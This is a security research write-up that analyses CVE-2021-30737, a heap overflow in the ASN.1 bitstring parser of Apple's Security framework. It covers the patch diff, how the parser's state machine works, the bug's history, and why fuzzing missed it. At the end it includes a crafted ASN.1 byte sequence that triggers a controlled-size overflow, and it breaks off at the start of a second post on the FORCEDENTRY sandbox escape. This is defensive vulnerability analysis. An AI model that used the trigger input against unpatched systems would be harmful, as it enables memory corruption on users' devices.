@xerub: CVE-2021-30737 is pretty bad. Please update ASAP. (Shameless excerpt from the full chain source code) 4:00 PM - May 25, 2021


The shameless excerpt reads:

// This is the real deal. Take no chances, take no prisoners! I AM THE STATE MACHINE!

And CVE-2021-30737, fixed in iOS 14.6 was described in the iOS release notes as:

Security. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution. Description: A memory corruption issue in the ASN.1 decoder was addressed by removing the vulnerable code. CVE-2021-30737: xerub


Feeling slightly annoyed that I hadn't acted on my instincts (there was clearly something awesome lurking there), I made a mental note to diff the source code once Apple released it, which they finally did a few weeks later on opensource.apple.com in the Security package.

Here's the diff between the macOS 11.4 and 11.3 versions of secasn1d.c, which contains the ASN.1 parser:

diff --git a/OSX/libsecurity_asn1/lib/secasn1d.c b/OSX/libsecurity_asn1/lib/secasn1d.c

index f338527..5b4915a 100644

--- a/OSX/libsecurity_asn1/lib/secasn1d.c

+++ b/OSX/libsecurity_asn1/lib/secasn1d.c

@@ -434,9 +434,6 @@ loser:

         PORT_ArenaRelease(cx->our_pool, state->our_mark);

         state->our_mark = NULL;

     }

-    if (new_state != NULL) {

-        PORT_Free(new_state);

-    }

     return NULL;

 }

 

@@ -1794,19 +1791,13 @@ sec_asn1d_parse_bit_string (sec_asn1d_state *state,

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if ((state->pending == 0) || (state->contents_length == 1)) {

+    if (state->pending == 0) {

                if (state->dest != NULL) {

                        SecAsn1Item *item = (SecAsn1Item *)(state->dest);

                        item->Data = NULL;

                        item->Length = 0;

                        state->place = beforeEndOfContents;

-               }

-               if(state->contents_length == 1) {

-                       /* skip over (unused) remainder byte */

-                       return 1;

-               }

-               else {

-                       return 0;

+            return 0;

                }

     }

The first change (removing the PORT_Free) is immaterial for Apple's use case: it fixes a double free, but only in a configuration where "allocator marks" are enabled, a feature which is disabled in Apple's build.

The vulnerability must therefore be in sec_asn1d_parse_bit_string. We know from xerub's tweet that something goes wrong with a state machine, but to figure it out we need to cover some ASN.1 basics and then start looking at how the NSS ASN.1 state machine works.

ASN.1 encoding

ASN.1 is a Type-Length-Value serialization format, but with the neat quirk that it can also handle the case when you don't know the length of the value, but want to serialize it anyway! That quirk is only possible when ASN.1 is encoded according to Basic Encoding Rules (BER.) There is a stricter encoding called DER (Distinguished Encoding Rules) which enforces that a particular value only has a single correct encoding and disallows the cases where you can serialize values without knowing their eventual lengths.

This page is a nice beginner's guide to ASN.1. I'd really recommend skimming that to get a good overview of ASN.1.

There are a lot of built-in types in ASN.1. I'm only going to describe the minimum required to understand this vulnerability (mostly because I don't know any more than that!) So let's just start from the very first byte of a serialized ASN.1 object and figure out how to decode it:

This first byte tells you the type, with the least significant 5 bits defining the type identifier. The special type identifier value of 0x1f tells you that the type identifier doesn't fit in those 5 bits and is instead encoded in a different way (which we'll ignore):

Diagram showing first two bytes of a serialized ASN.1 object. The first byte in this case is the type and class identifier and the second is the length.


The upper two bits of the first byte tell you the class of the type: universal, application, content-specific or private. For us, we'll leave that as 0 (universal.)

Bit 6 is where the fun starts. A value of 0 tells us that this is a primitive encoding, which means that following the length are content bytes which can be directly interpreted as the intended type. For example, a primitive encoding of the string "HELLO" as an ASN.1 printable string would have a length byte of 5 followed by the ASCII characters "HELLO". All fairly straightforward.

A value of 1 for bit 6 however tells us that this is a constructed encoding. This means that the bytes following the length are not the "raw" content bytes for the type but are instead ASN.1 encodings of one or more "chunks" which need to be individually parsed and concatenated to form the final output value. And to make things extra complicated it's also possible to specify a length value of 0, which means that you don't even know how long the reconstructed output will be or how much of the subsequent input will be required to completely build the output.

This final case (of a constructed type with indefinite length) is known as indefinite form. The end of the input which makes up a single indefinite value is signaled by a serialized type with the identifier, constructed, class and length values all equal to 0, which is encoded as two NULL bytes.
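To make this concrete, here are example encodings of my own (not taken from any test case in this post): the string "HELLO" first as a primitive printable string, then as a constructed, indefinite-length string built from two chunks:

// Primitive: universal | primitive | PrintableString (0x13), length 5:
uint8_t primitive[]   = {0x13, 0x05, 'H', 'E', 'L', 'L', 'O'};

// Constructed (bit 6 set) with indefinite length (0x80): two primitive
// chunks, then the two-NULL-byte end-of-contents marker:
uint8_t constructed[] = {0x33, 0x80,
                         0x13, 0x03, 'H', 'E', 'L',
                         0x13, 0x02, 'L', 'O',
                         0x00, 0x00};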

ASN.1 bitstrings

Most of the ASN.1 string types require no special treatment; they're just buffers of raw bytes. Some of them have length restrictions. For example: a BMP string must have an even length and a UNIVERSAL string must be a multiple of 4 bytes in length, but that's about it.

ASN.1 bitstrings are strings of bits as opposed to bytes. You could for example have a bitstring with a length of a single bit (so either a 0 or 1) or a bitstring with a length of 127 bits (so 15 full bytes plus an extra 7 bits.)

Encoded ASN.1 bitstrings have an extra metadata byte after the length but before the contents, which encodes the number of unused bits in the final byte.

Diagram showing the complete encoding of a 3-bit bitstring. The length of 2 includes the unused-bits count byte which has a value of 5, indicating that only the 3 most-significant bits of the final byte are valid.

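In raw bytes, the bitstring from that diagram could be encoded like this (choosing 0b101 as the three valid bits; my own example):

uint8_t bitstring[] = {0x03,   // universal | primitive | BIT STRING
                       0x02,   // length: unused-bits byte plus 1 content byte
                       0x05,   // 5 of the 8 bits in the final byte are unused
                       0xa0};  // 0b101xxxxx: the three valid bits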

Parsing ASN.1

ASN.1 data always needs to be decoded in tandem with a template that tells the parser what data to expect and also provides output pointers to be filled in with the parsed output data. Here's the template my test program uses to exercise the bitstring code:

const SecAsn1Template simple_bitstring_template[] = {

  {

    SEC_ASN1_BIT_STRING | SEC_ASN1_MAY_STREAM, // kind: bit string,

                                         //  may be constructed

    0,     // offset: in dest/src

    NULL,  // sub: subtemplate for indirection

    sizeof(SecAsn1Item) // size: of output structure

  }

};

A SecAsn1Item is a very simple wrapper around a buffer. We can provide a SecAsn1Item for the parser to use to return the parsed bitstring, then call the parser:

SecAsn1Item decoded = {0};

PLArenaPool* pool = PORT_NewArena(1024);

SECStatus status =

  SEC_ASN1Decode(pool,     // pool: arena for destination allocations

                 &decoded, // dest: decoded encoded items in to here

                 simple_bitstring_template, // template

                 asn1_bytes,      // buf: asn1 input bytes

                 asn1_bytes_len); // len: input size

NSS ASN.1 state machine

The state machine has two core data structures:

SEC_ASN1DecoderContext - the overall parsing context

sec_asn1d_state - a single parser state, kept in a doubly-linked list forming a stack of nested states

Here's a trimmed version of the state object showing the relevant fields:

typedef struct sec_asn1d_state_struct {

  SEC_ASN1DecoderContext *top; 

  const SecAsn1Template *theTemplate;

  void *dest;

 

  struct sec_asn1d_state_struct *parent;

  struct sec_asn1d_state_struct *child;

 

  sec_asn1d_parse_place place;

 

  unsigned long contents_length;

  unsigned long pending;

  unsigned long consumed;

  int depth;

} sec_asn1d_state;

The main engine of the parsing state machine is the method SEC_ASN1DecoderUpdate which takes a context object, raw input buffer and length:

SECStatus

SEC_ASN1DecoderUpdate (SEC_ASN1DecoderContext *cx,

                       const char *buf, size_t len)

The current state is stored in the context object's current field, and that state's place field determines which state the parser is in. Those states are defined here:

typedef enum {

    beforeIdentifier,

    duringIdentifier,

    afterIdentifier,

    beforeLength,

    duringLength,

    afterLength,

    beforeBitString,

    duringBitString,

    duringConstructedString,

    duringGroup,

    duringLeaf,

    duringSaveEncoding,

    duringSequence,

    afterConstructedString,

    afterGroup,

    afterExplicit,

    afterImplicit,

    afterInline,

    afterPointer,

    afterSaveEncoding,

    beforeEndOfContents,

    duringEndOfContents,

    afterEndOfContents,

    beforeChoice,

    duringChoice,

    afterChoice,

    notInUse

} sec_asn1d_parse_place;

The state machine loop switches on the place field to determine which method to call:

  switch (state->place) {

    case beforeIdentifier:

      consumed = sec_asn1d_parse_identifier (state, buf, len);

      what = SEC_ASN1_Identifier;

      break;

    case duringIdentifier:

      consumed = sec_asn1d_parse_more_identifier (state, buf, len);

      what = SEC_ASN1_Identifier;

      break;

    case afterIdentifier:

      sec_asn1d_confirm_identifier (state);

      break;

...

Each state method which could consume input is passed a pointer (buf) to the next unconsumed byte in the raw input buffer and a count of the remaining unconsumed bytes (len).

It's then up to each of those methods to return how much of the input they consumed, and signal any errors by updating the context object's status field.

The parser can be recursive: a state can set its ->place field to a state which expects to handle a parsed child state and then allocate a new child state. For example when parsing an ASN.1 sequence:

  state->place = duringSequence;

  state = sec_asn1d_push_state (state->top, state->theTemplate + 1,

                                state->dest, PR_TRUE);

The current state sets its own next state to duringSequence then calls sec_asn1d_push_state which allocates a new state object, with a new template and a copy of the parent's dest field.

sec_asn1d_push_state updates the context's current field such that the next loop around SEC_ASN1DecoderUpdate will see this child state as the current state:

    cx->current = new_state;

Note that the initial value of the place field (which determines the current state) of the newly allocated child is determined by the template. The final state in the state machine path followed by that child will then be responsible for popping itself off the state stack such that the duringSequence state can be reached by its parent to consume the results of the child.

Buffer management

The buffer management is where the NSS ASN.1 parser starts to get really mind-bending. If you read through the code you'll notice an extreme lack of bounds checks when the output buffers are being filled in; there basically are none. For example, sec_asn1d_parse_leaf, which copies the raw encoded string bytes, simply memcpy's into the output buffer with no check that the length of the string matches the size of the buffer.

Rather than using explicit bounds checks to ensure lengths are valid, the memory safety is instead supposed to be achieved by relying on the fact that decoding valid ASN.1 can never produce output which is larger than its input.

That is, there are no forms of decompression or input expansion so any parsed output data must be equal to or shorter in length than the input which encoded it. NSS leverages this and over-allocates all output buffers to simply be as large as their inputs.

For primitive strings this is quite simple: the length and input are provided so there's nothing really to go that wrong. But for constructed strings this gets a little fiddly...

One way to think of constructed strings is as trees of substrings, nested up to 32-levels deep. Here's an example:

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.


We start with a constructed definite length string. The string's length value L is the complete size of the remaining input which makes up this string; that number of input bytes should be parsed as substrings and concatenated to form the parsed output.

At this point the NSS ASN.1 string parser allocates the output buffer for the parsed output string using the length L of that first input string. This buffer is an over-allocated worst case. The part which makes it really fun though is that NSS allocates the output buffer then promptly throws away that length! This might not be so obvious from quickly glancing through the code though. The buffer which is allocated is stored as the Data field of a buffer wrapper type:

typedef struct cssm_data {

    size_t Length;

    uint8_t * __nullable Data;

} SecAsn1Item, SecAsn1Oid;

(Recall that we passed in a pointer to a SecAsn1Item in the template; it's the Data field of that which gets filled in with the allocated string buffer pointer here. This type is very slightly different between NSS and Apple's fork, but the difference doesn't matter here.)

That Length field is not the size of the allocated Data buffer. It's a (type-specific) count which determines how many bits or bytes of the buffer pointed to by Data are valid. I say type-specific because for bit-strings Length is stored in units of bits but for other strings it's in units of bytes. (CVE-2016-1950 was a bug in NSS where the code mixed up those units.)

Rather than storing the allocated buffer size along with the buffer pointer, each time a substring/child string is encountered the parser walks back up the stack of currently-being-parsed states to find the inner-most definite length string. As it walks up the states it examines each one to determine how much of its input has been consumed, in order to work out whether the current to-be-parsed substring is indeed completely enclosed within the inner-most enclosing definite length string.

If that sounds complicated, it is! The logic which does this is here, and it took me a good few days to pull it apart enough to figure out what this was doing:

sec_asn1d_state *parent = sec_asn1d_get_enclosing_construct(state);

while (parent && parent->indefinite) {

  parent = sec_asn1d_get_enclosing_construct(parent);

}

unsigned long remaining = parent->pending;

parent = state;

do {

  if (!sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->consumed,

                                           state->top)

      ||

      /* If parent->indefinite is true, parent->contents_length is

       * zero and this is a no-op. */

      !sec_asn1d_check_and_subtract_length(&remaining,

                                           parent->contents_length,

                                           state->top)

      ||

      /* If parent->indefinite is true, then ensure there is enough

       * space for an EOC tag of 2 bytes. */

      (  parent->indefinite

          &&

          !sec_asn1d_check_and_subtract_length(&remaining,

                                               2,

                                               state->top)

      )

    ) {

      /* This element is larger than its enclosing element, which is

       * invalid. */

       return;

    }

} while ((parent = sec_asn1d_get_enclosing_construct(parent))

         &&

         parent->indefinite);

It first walks up the state stack to find the innermost constructed definite state and uses its state->pending value as an upper bound. It then walks the state stack again and for each in-between state subtracts from that original value of pending how many bytes could have been consumed by those in between states. It's pretty clear that the pending value is therefore vitally important; it's used to determine an upper bound so if we could mess with it this "bounds check" could go wrong.

After figuring out that this was pretty clearly the only place where any kind of bounds checking takes place I looked back at the fix more closely.

We know that sec_asn1d_parse_bit_string is the only function which changed:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

   

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

   

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

   

    byte = (unsigned char) *buf;

    if (byte > 7) {

        dprintf("decodeError: parse_bit_string remainder oflow\n");

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

   

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

   

    return 1;

}

The code removed by the patch is the special-casing of state->contents_length == 1 shown above. This function is meant to return the number of input bytes (pointed to by buf) which it consumed, and my initial hunch was that the patch was removing a path through this function where the count of input bytes consumed and state->pending could get out of sync: when they return 1 in the removed code they should also decrement state->pending, as they do in the other place where this function returns 1.

I spent quite a while trying to figure out how you could actually turn that into something useful but in the end I don't think you can.

So what else is going on here?

This state is reached with buf pointing to the first byte after the length value of a primitive bitstring. state->contents_length is the value of that parsed length. Bitstrings, as discussed earlier, are a unique ASN.1 string type in that they have an extra meta-data byte at the beginning (the unused-bits count byte.) It's perfectly fine to have a definite zero-length string - indeed that's (sort-of) handled earlier than this in the prepareForContents state, which short-circuits straight to afterEndOfContents:

if (state->contents_length == 0 && (! state->indefinite)) {

  /*

   * A zero-length simple or constructed string; we are done.

   */

  state->place = afterEndOfContents;

Here they're detecting a definite-length string type with a content length of 0. But this doesn't handle the edge case of a bitstring which consists only of the unused-bits count byte. The state->contents_length value of that bitstring will be 1, but it doesn't actually have any "contents".
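Concretely, such an encoding is just three bytes (my own illustration):

uint8_t unused_bits_only[] = {0x03,  // universal | primitive | BIT STRING
                              0x01,  // contents_length == 1...
                              0x00}; // ...but it's only the unused-bits byte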

It's this case which the (state->contents_length == 1) conditional in sec_asn1d_parse_bit_string matches:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

By setting state->place to beforeEndOfContents they are again trying to short-circuit the state machine to skip ahead to the state after the string contents have been consumed. But here they take an additional step which they didn't take when trying to achieve exactly the same thing in prepareForContents. In addition to updating state->place they also NULL out the dest SecAsn1Item's Data field and set the Length to 0.

I mentioned earlier that the new child states which are allocated to recursively parse the sub-strings of constructed strings get a copy of the parent's dest field (which is a pointer to a pointer to the output buffer.) This makes sense: that output buffer is only allocated once then gets recursively filled-in in a linear fashion by the children. (Technically this isn't actually how it works if the outermost string is indefinite length, there's separate handling for that case which instead builds a linked-list of substrings which are eventually concatenated, see sec_asn1d_concat_substrings.)

If the output buffer is only allocated once, what happens if you set Data to NULL like they do here? Taking a step back, does that actually make any sense at all?

No, I don't think it makes any sense. Setting Data to NULL at this point should at the very least cause a memory leak, as it's the only pointer to the output buffer.

The fun part though is that that's not the only consequence of NULLing out that pointer. item->Data is used to signal something else.

Here's a snippet from prepare_for_contents where it's determining whether there's enough space in the output buffer for this substring:

} else if (state->substring) {

  /*

   * If we are a substring of a constructed string, then we may

   * not have to allocate anything (because our parent, the

   * actual constructed string, did it for us).  If we are a

   * substring and we *do* have to allocate, that means our

   * parent is an indefinite-length, so we allocate from our pool;

   * later our parent will copy our string into the aggregated

   * whole and free our pool allocation.

   */

  if (item->Data == NULL) {

    PORT_Assert (item->Length == 0);

    poolp = state->top->our_pool;

  } else {

    alloc_len = 0;

  }

As the comment implies, if both item->Data is NULL at this point and state->substring is true, then (they believe) it must be the case that they are currently parsing a substring of an outer-level indefinite string, which has no definite-sized buffer already allocated. In that case the meaning of the item->Data pointer is different to that which we describe earlier: it's merely a temporary buffer meant to hold only this substring. Just above here alloc_len was set to the content length of this substring; and for the outer-definite-length case it's vitally important that alloc_len then gets set to 0 here (which is really indicating that a buffer has already been allocated and they must not allocate a new one.)

To emphasize the potentially subtle point: the issue is that using this conjunction (state->substring && !item->Data) to determine whether this is a substring of a definite length or outer-level-indefinite string is not the same as the method used by the convoluted bounds checking code we saw earlier. That method walks up the current state stack and checks the indefinite bits of the super-strings to determine whether they're processing a substring of an outer-level-indefinite string.

Putting that all together, you might be able to see where this is going... (but it is still pretty subtle.)

Assume that we have an outer definite-length constructed bitstring with three primitive bitstrings as substrings:

Upon encountering the first outer-most definite length constructed bitstring, the code will allocate a fixed-size buffer, large enough to store all the remaining input which makes up this string, which in this case is 42 bytes. At this point dest->Data points to that buffer.

They then allocate a child state, which gets a copy of the dest pointer (not a copy of the dest SecAsn1Item object; a copy of a pointer to it), and proceed to parse the first child substring.

This is a primitive bitstring with a length of 1 which triggers the vulnerable path in sec_asn1d_parse_bit_string and sets dest->Data to NULL. The state machine skips ahead to beforeEndOfContents then eventually the next substring gets parsed - this time with dest->Data == NULL.

Now the logic goes wrong in a bad way and, as we saw in the snippet above, a new dest->Data buffer gets allocated which is the size of only this substring (2 bytes), when in fact dest->Data should already point to a buffer large enough to hold the entire outer-level input string. This bitstring's contents then get parsed and copied into that new, too-small buffer.

Now we come to the third substring. dest->Data is no longer NULL; but the code now has no way of determining that the buffer was in fact only (erroneously) allocated to hold a single substring. It believes the invariant that item->Data only gets allocated once, when the first outer-level definite length string is encountered, and it's that fact alone which it uses to determine whether dest->Data points to a buffer large enough to have this substring appended to it. It then happily appends this third substring, writing outside the bounds of the buffer allocated to store only the second substring.

This gives you a great memory corruption primitive: you can cause allocations of a controlled size and then overflow them with an arbitrary number of arbitrary bytes.

Here's an example encoding for an ASN.1 bitstring which triggers this issue:

   uint8_t concat_bitstrings_constructed_definite_with_zero_len_realloc[]

        = {ASN1_CLASS_UNIVERSAL | ASN1_CONSTRUCTED | ASN1_BIT_STRING, // (0x23)

           0x4a, // initial allocation size

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x1, // force item->Data = NULL

           0x0, // number of unused bits in the final byte

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x2, // this is the reallocation size

           0x0, // number of unused bits in the final byte

           0xff, // only byte of bitstring

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x41, // 64 actual bytes, plus the remainder, will cause 0x40 byte memcpy one byte in to 2 byte allocation

           0x0, // number of unused bits in the final byte

           0xff,

           0xff,// -- continues for overflow

Why wasn't this found by fuzzing?

This is a reasonable question to ask. This source code is really, really hard to audit; even with the diff it was at least a week of work to figure out the true root cause of the bug. I'm not sure I would have spotted this issue during a code audit. It's very broken, but it's quite subtle, and you have to figure out a lot about the state machine and the bounds-checking rules to see it. I think I might have given up before I figured it out and gone to look for something easier.

But the trigger test-case is neither structurally complex nor large, and feels within-grasp for a fuzzer. So why wasn't it found? I'll offer two points for discussion:

Perhaps it's not being fuzzed?

Or at least, it's not being fuzzed in the exact form which it appears in Apple's Security.framework library. I understand that both Mozilla and Google do fuzz the NSS ASN.1 parser and have found a bunch of vulnerabilities, but note that the key part of the vulnerable code ("|| (state->contents_length == 1" in sec_asn1d_parse_bit_string) isn't present in upstream NSS (more on that below.)

Can it be fuzzed effectively?

Even if you did build the Security.framework version of the code and used a coverage guided fuzzer, you might well not trigger any crashes. The code uses a custom heap allocator and you'd have to either replace that with direct calls to the system allocator or use ASAN's custom allocator hooks. Note that upstream NSS does do that, but as I understand it, Apple's fork doesn't.
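For reference, teaching ASan about a custom arena allocator looks something like the sketch below; the __asan_* calls are LLVM's public manual-poisoning interface, while the arena type and the bump allocation are hypothetical stand-ins:

#include <stddef.h>
#include <stdint.h>
#include <sanitizer/asan_interface.h>

typedef struct { uint8_t *base; size_t size; size_t used; } arena_t; // hypothetical

void *arena_alloc(arena_t *a, size_t n) {
    void *p = a->base + a->used;          // hypothetical bump allocation
    a->used += n;
    __asan_unpoison_memory_region(p, n);  // this chunk is now legal to touch
    return p;
}

void arena_destroy(arena_t *a) {
    // re-poison the whole arena so stale pointers into it trap under ASan
    __asan_poison_memory_region(a->base, a->size);
}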

History

I'm always interested in understanding not just how a vulnerability works but how it was introduced. This case is a particularly compelling example because, once you understand the bug, the code construct looks extremely suspicious: it only exists in Apple's fork of NSS and the only impact of the change is to introduce a perfect memory corruption primitive. But let's go through the history of the code to convince ourselves that it is much more likely that it was just an unfortunate accident:

The earliest reference to this code I can find is this, which appears to be the initial checkin in the Mozilla CVS repo on March 31, 2000:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

    PORT_Assert (state->pending > 0);

    PORT_Assert (state->place == beforeBitString);

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

On August 24th, 2001 the form of the code changed to something like the current version, in this commit with the message "Memory leak fixes.":

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

-   PORT_Assert (state->pending > 0);

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

+   if (state->pending == 0) {

+       if (state->dest != NULL) {

+           SECItem *item = (SECItem *)(state->dest);

+           item->data = NULL;

+           item->len = 0;

+           state->place = beforeEndOfContents;

+           return 0;

+       }

+   }

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

This commit added the item->data = NULL line but here it's only reachable when pending == 0. I am fairly convinced that this was dead code and not actually reachable (and that the PORT_Assert which they commented out was actually valid.)

The beforeBitString state (which leads to the sec_asn1d_parse_bit_string method being called) will always be preceded by the afterLength state (implemented by sec_asn1d_prepare_for_contents.) On entry to the afterLength state, state->contents_length is equal to the parsed length field, and sec_asn1d_prepare_for_contents does:

state->pending = state->contents_length;

So in order to reach sec_asn1d_parse_bit_string with state->pending == 0, state->contents_length would also need to be 0 in sec_asn1d_prepare_for_contents.

That means that in the if/else decision tree below, at least one of the two conditionals must be true:

        if (state->contents_length == 0 && (! state->indefinite)) {

            /*

             * A zero-length simple or constructed string; we are done.

             */

            state->place = afterEndOfContents;

...

        } else if (state->indefinite) {

            /*

             * An indefinite-length string *must* be constructed!

             */

            dprintf("decodeError: prepare for contents indefinite not construncted\n");

            PORT_SetError (SEC_ERROR_BAD_DER);

            state->top->status = decodeError;

yet it is required that neither of those be true in order to reach the final else which is the only path to reaching sec_asn1d_parse_bit_string via the beforeBitString state:

        } else {

            /*

             * A non-zero-length simple string.

             */

            if (state->underlying_kind == SEC_ASN1_BIT_STRING)

                state->place = beforeBitString;

            else

                state->place = duringLeaf;

        }

So at that point (24 August 2001) the NSS codebase had some dead code which looked like it was trying to handle parsing an ASN.1 bitstring which didn't have an unused-bits byte. As we've seen in the rest of this post though, that handling is quite wrong, but it didn't matter as the code was unreachable.

The earliest reference to Apple's fork of that NSS code I can find is in the SecurityNssAsn1-11 package for OS X 10.3 (Panther) which would have been released October 24th, 2003. In that project we can find a CHANGES.apple file which tells us a little more about the origins of Apple's fork:

General Notes

-------------

1. This module, SecurityNssAsn1, is based on the Netscape Security

   Services ("NSS") portion of the Mozilla Browser project. The

   source upon which SecurityNssAsn1 was based was pulled from

   the Mozilla CVS repository, top of tree as of January 21, 2003.

   The SecurityNssAsn1 project contains only those portions of NSS

   used to perform BER encoding and decoding, along with minimal

   support required by the encode/decode routines.

2. The directory structure of SecurityNssAsn1 differs significantly

   from that of NSS, rendering simple diffs to document changes

   unwieldy. Diffs could still be performed on a file-by-file basis.

   

3. All Apple changes are flagged by the symbol __APPLE__, either

   via "#ifdef __APPLE__" or in a comment.

That document continues on to outline a number of broad changes which Apple made to the code, including reformatting the code and changing a number of APIs to add new features. We also learn the date at which Apple forked the code (January 21, 2003) so we can go back through a github mirror of the mozilla CVS repository to find the version of secasn1d.c as it would have appeared then and diff them.

From that diff we can see that the Apple developers actually made fairly significant changes in this initial import, indicating that this code underwent some level of review prior to importing it. For example:

@@ -1584,7 +1692,15 @@

     /*

      * If our child was just our end-of-contents octets, we are done.

      */

+       #ifdef  __APPLE__

+       /*

+        * Without the check for !child->indefinite, this path could

+        * be taken erroneously if the child is indefinite!

+        */

+       if(child->endofcontents && !child->indefinite) {

+       #else

     if (child->endofcontents) {

They were pretty clearly looking for potential correctness issues with the code while they were refactoring it. The example shown above is a non-trivial change and one which persists to this day. (And I have no idea whether the NSS or Apple version is correct!) Reading the diff we can see that not every change ended up being marked with #ifdef __APPLE__ or a comment. They also made this change to sec_asn1d_parse_bit_string:

@@ -1372,26 +1469,33 @@

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if (state->pending == 0) {

-       if (state->dest != NULL) {

-           SECItem *item = (SECItem *)(state->dest);

-           item->data = NULL;

-           item->len = 0;

-           state->place = beforeEndOfContents;

-           return 0;

-       }

+    if ((state->pending == 0) || (state->contents_length == 1)) {

+               if (state->dest != NULL) {

+                       SECItem *item = (SECItem *)(state->dest);

+                       item->Data = NULL;

+                       item->Length = 0;

+                       state->place = beforeEndOfContents;

+               }

+               if(state->contents_length == 1) {

+                       /* skip over (unused) remainder byte */

+                       return 1;

+               }

+               else {

+                       return 0;

+               }

     }

In the context of all the other changes in this initial import this change looks much less suspicious than I first thought. My guess is that the Apple developers thought that Mozilla had missed handling the case of a bitstring with only the unused-bits byte and attempted to add support for it. It looks like the state->pending == 0 conditional must have been Mozilla's check for handling a 0-length bitstring, so it was quite reasonable to think that NULLing out item->data was the right way to handle that case, and therefore that it must also be correct to add the contents_length == 1 case here.

In reality the contents_length == 1 case was handled perfectly correctly anyway in sec_asn1d_parse_more_bit_string, but it wasn't unreasonable to assume that it had been overlooked based on what looked like a special case handling for the missing unused-bits byte in sec_asn1d_parse_bit_string.

The fix for the bug was simply to revert the change made during the initial import 18 years ago, deleting the contents_length == 1 clauses from the code below and making the dangerous path unreachable once more:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

Conclusions

Forking complicated code is complicated. In this case it took almost two decades to, in the end, simply revert a change made during the initial import. Even verifying whether this revert is correct is really hard.

The Mozilla and Apple codebases have continued to diverge since 2003. As I discovered slightly too late to be useful, the Mozilla code now has more comments trying to explain the decoder's "novel" memory safety approach.

Rewriting this code to be more understandable (and maybe even memory safe) is also distinctly non-trivial. The code doesn't just implement ASN.1 decoding; it also has to support safely decoding incorrectly encoded data, as described by this verbatim comment for example:

 /*

  * Okay, this is a hack.  It *should* be an error whether

  * pending is too big or too small, but it turns out that

  * we had a bug in our *old* DER encoder that ended up

  * counting an explicit header twice in the case where

  * the underlying type was an ANY.  So, because we cannot

  * prevent receiving these (our own certificate server can

  * send them to us), we need to be lenient and accept them.

  * To do so, we need to pretend as if we read all of the

  * bytes that the header said we would find, even though

  * we actually came up short.

  */

Verifying that a rewritten, simpler decoder also handles every hard-coded edge case correctly probably leads to it not being so simple after all.

FORCEDENTRY: Sandbox Escape

31 March 2022 at 16:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. Any editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Late last year we published a writeup of the initial remote code execution stage of FORCEDENTRY, the zero-click iMessage exploit attributed by Citizen Lab to NSO. By sending a .gif iMessage attachment (which was really a PDF) NSO were able to remotely trigger a heap buffer overflow in the ImageIO JBIG2 decoder. They used that vulnerability to bootstrap a powerful weird machine capable of loading the next stage in the infection process: the sandbox escape.

In this post we'll take a look at that sandbox escape. It's notable for using only logic bugs. In fact it's unclear where the features that it uses end and the vulnerabilities which it abuses begin. Both current and upcoming state-of-the-art mitigations such as Pointer Authentication and Memory Tagging have no impact at all on this sandbox escape.

An observation

During our initial analysis of the .gif file Samuel noticed that rendering the image appeared to leak memory. Running the heap tool after releasing all the associated resources gave the following output:

$ heap $pid

------------------------------------------------------------

All zones: 4631 nodes (826336 bytes)        

             

   COUNT    BYTES     AVG   CLASS_NAME   TYPE   BINARY          

   =====    =====     ===   ==========   ====   ======        

    1969   469120   238.3   non-object

